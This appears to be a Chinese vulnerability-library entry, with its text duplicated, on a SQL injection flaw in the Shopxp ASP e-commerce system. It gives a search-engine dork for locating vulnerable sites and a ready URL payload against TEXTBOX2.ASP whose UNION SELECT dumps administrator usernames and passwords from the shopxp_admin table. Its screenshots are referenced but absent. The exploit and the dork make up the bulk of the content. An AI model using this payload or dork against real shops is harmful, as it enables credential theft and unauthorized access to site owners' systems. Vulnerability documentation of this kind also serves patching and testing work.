VULHUB ™

### 0x01 框架概述 Shopxp网上购物系统是一个经过完善设计的经典商城购物管理系统，适用于各种服务器环境的高效网上购物网站建设解决方案。Shopxp 网店系统具有丰富的 web 应用程序设计经验，尤其在购物系统产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术，使得shopxp 商城系统无论在稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位。 开发语言：ASP 软件语言：简体中文 数据库：Access、Mssql 关键字：inurl:shopxp_news.asp  ### 0x02 漏洞利用 注入代码：TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2b';;!!;;'%2bpassword%2b';;!!;;',4,5,6,7%20from%20shopxp_admin 爆出用户名和密码 本地环境示意如下：  利用payload爆出用户名密码如下  Pocsuite证明截图如下  ### 0x03 参考链接 http://www.myhack58.com/Article/html/3/62/2012/34043.htm

### 0x01 框架概述 Shopxp网上购物系统是一个经过完善设计的经典商城购物管理系统，适用于各种服务器环境的高效网上购物网站建设解决方案。Shopxp 网店系统具有丰富的 web 应用程序设计经验，尤其在购物系统产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术，使得shopxp 商城系统无论在稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位。 开发语言：ASP 软件语言：简体中文 数据库：Access、Mssql 关键字：inurl:shopxp_news.asp  ### 0x02 漏洞利用 注入代码：TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2b';;!!;;'%2bpassword%2b';;!!;;',4,5,6,7%20from%20shopxp_admin 爆出用户名和密码 本地环境示意如下：  利用payload爆出用户名密码如下  Pocsuite证明截图如下  ### 0x03 参考链接 http://www.myhack58.com/Article/html/3/62/2012/34043.htm